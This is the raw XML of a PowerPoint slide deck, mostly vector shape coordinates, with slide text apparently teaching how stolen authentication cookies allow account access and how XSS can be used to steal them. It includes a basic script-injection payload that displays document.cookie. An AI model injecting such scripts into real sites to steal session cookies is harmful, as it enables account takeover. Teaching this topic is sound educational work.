                    <a:pt x="243585" y="83820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239014" y="80010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236347" y="77470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230504" y="73660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227583" y="72389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224408" y="71120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212344" y="66039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200151" y="64770"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="103754" y="102870"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="75183" y="102870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77977" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78104" y="162560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78358" y="163829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78612" y="163829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79248" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81025" y="166370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82296" y="167639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85851" y="170179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88392" y="170179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91567" y="172720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98298" y="175260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100583" y="176529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106806" y="176529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107442" y="175260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107823" y="173989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107950" y="172720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107866" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103754" y="102870"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="347218" y="134620"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="308101" y="134620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310769" y="135889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313690" y="137160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317373" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320548" y="140970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323342" y="142239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326008" y="144779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328295" y="147320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330073" y="149860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="331977" y="152400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333501" y="153670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334645" y="154939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335915" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336803" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340232" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340868" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342137" y="156210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342900" y="154939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343534" y="153670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345058" y="151129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345948" y="149860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346836" y="147320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347472" y="146050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347979" y="144779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348742" y="142239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349123" y="140970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348996" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348233" y="135889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347218" y="134620"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="64770" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="60959" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60325" y="1270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59817" y="5079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59817" y="10160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64389" y="77470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4191" y="121920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2540" y="123189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1524" y="124460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380" y="125729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="127000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="761" y="129539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1777" y="130810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3682" y="132079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5460" y="132079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8127" y="134620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11683" y="135889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14731" y="137160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17145" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19176" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21081" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28067" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28955" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75183" y="102870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103754" y="102870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103250" y="95250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136905" y="69850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92709" y="69850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89661" y="16510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89534" y="15239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89026" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88519" y="11429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86614" y="10160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85217" y="8889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83439" y="8889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81660" y="7620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79121" y="6350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75946" y="5079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72135" y="2539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69087" y="1270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66928" y="1270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64770" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="241934" y="113029"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="239268" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239902" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241300" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241934" y="113029"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="248094" y="88900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="207264" y="88900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209676" y="90170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212344" y="90170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215265" y="91439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219075" y="93979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222250" y="95250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227583" y="100329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229870" y="102870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231775" y="104139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233552" y="106679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235076" y="109220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236347" y="110489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237490" y="111760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238505" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242570" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243840" y="111760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245236" y="109220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245872" y="107950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246760" y="106679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247650" y="104139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249047" y="100329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249554" y="100329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250062" y="99060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250825" y="95250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250825" y="93979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250571" y="92710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249808" y="91439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248920" y="90170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248094" y="88900"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="142494" y="35560"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="136525" y="35560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135127" y="36829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92709" y="69850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136905" y="69850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157099" y="54610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159257" y="53339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160908" y="50800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163068" y="49529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163322" y="48260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144399" y="36829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142494" y="35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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{744A45DF-71DE-98F8-A5E9-DDAB800814C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520700" y="648335"/>
            <a:ext cx="6309995" cy="116078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90"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>Cookies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4F81BC"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>authentication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45"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>Getting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your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cookies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stolen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 result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someone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else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getting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unauthorized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access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your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account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/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account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BA86C12-BF25-2941-8876-4DAB85E644CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520700" y="2535428"/>
            <a:ext cx="209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25" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> we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inject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script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43B0B848-6504-5AC3-26C5-6665D1DA7A3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="874572" y="2983179"/>
            <a:ext cx="97986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ourier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert(document.cookie);&lt;/script&gt;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DCFCB756-673B-0CFB-E04B-88B40204025C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546303" y="3902202"/>
            <a:ext cx="4971415" cy="1605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Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>This will s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>how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our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cookies,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which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is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not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very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helpful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 MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>If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someone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visits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page,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want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steal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their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spc="5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>cookies!</a:t>
            </a:r>
            <a:endParaRPr sz="20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90476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7FC9AE4-F899-9695-E387-779954E4B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836" y="46482"/>
            <a:ext cx="65317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Stealing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Cookie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Information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> via XSS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3" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB9329FB-0E63-55F0-F25F-A4C86CF077E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8447531" y="44196"/>
            <a:ext cx="3714115" cy="2496820"/>
            <a:chOff x="8447531" y="44196"/>
            <a:chExt cx="3714115" cy="2496820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="object 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28F0581A-759D-8B17-5A05-0C615EEF80B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7531" y="44196"/>
              <a:ext cx="3713987" cy="2496312"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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28CA5065-E3D3-AE07-0B03-75C093173089}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10438293" y="1162494"/>
              <a:ext cx="708660" cy="462280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="708659" h="462280">
                  <a:moveTo>
                    <a:pt x="163792" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="120203" y="3692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81952" y="12777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24959" y="47048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="101504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1266" y="133346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29273" y="201954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54906" y="237378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87553" y="272654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126660" y="307109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171673" y="340073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222039" y="370875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277203" y="398843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334418" y="422419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390648" y="440504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445023" y="453118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496674" y="460281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544729" y="462010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588319" y="458325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626573" y="449245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683595" y="414976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708551" y="360517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707257" y="328666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679212" y="260026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653568" y="224583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620913" y="189289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="581801" y="154816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536785" y="121838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486419" y="91026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431254" y="63055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374071" y="39514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317860" y="21456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263494" y="8863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211847" y="1717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1637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B929DD2D-6042-B228-3D5D-8C601E765155}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10438293" y="1162494"/>
              <a:ext cx="708660" cy="462280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="708659" h="462280">
                  <a:moveTo>
                    <a:pt x="7963" y="72199"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="49913" y="27235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120203" y="3692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163792" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211847" y="1717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263494" y="8863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317860" y="21456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374071" y="39514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431254" y="63055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486419" y="91026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536785" y="121838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="581801" y="154816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620913" y="189289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653568" y="224583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679212" y="260026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697293" y="294944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708551" y="360517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700621" y="389826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="658622" y="434789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588319" y="458325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544729" y="462010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496674" y="460281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445023" y="453118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390648" y="440504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334418" y="422419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277203" y="398843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222039" y="370875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171673" y="340073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126660" y="307109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87553" y="272654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54906" y="237378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29273" y="201954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11208" y="167053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="101504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7963" y="7219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5D5EB16C-C6CA-4AFC-21B0-65AD58155664}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10609198" y="1264284"/>
              <a:ext cx="349250" cy="254000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="232155" y="199389"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="230124" y="199389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229489" y="200660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227965" y="201929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227202" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224790" y="207010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223900" y="209550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222376" y="212089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221487" y="214629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220725" y="218439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220852" y="220979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221233" y="220979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222757" y="224789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224154" y="226060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225678" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227583" y="231139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232664" y="236220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235584" y="238760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242697" y="243839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246760" y="245110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251332" y="247650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264668" y="252729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271399" y="254000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284479" y="254000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318389" y="229870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273430" y="229870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267589" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236093" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234823" y="201929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233806" y="200660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232791" y="200660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232155" y="199389"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="298576" y="109220"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="292734" y="109220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287400" y="110489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281940" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276986" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267970" y="121920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264286" y="127000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261366" y="133350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258952" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257555" y="144779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257428" y="148589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257175" y="153670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257809" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260350" y="166370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262127" y="170179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264541" y="172720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266826" y="176529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269494" y="180339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272287" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274954" y="186689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277749" y="189229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282955" y="195579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285242" y="198120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287147" y="201929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288925" y="204470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290195" y="207010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290829" y="209550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291465" y="213360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291083" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288544" y="220979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287020" y="223520"/>
                  </a:lnTo>
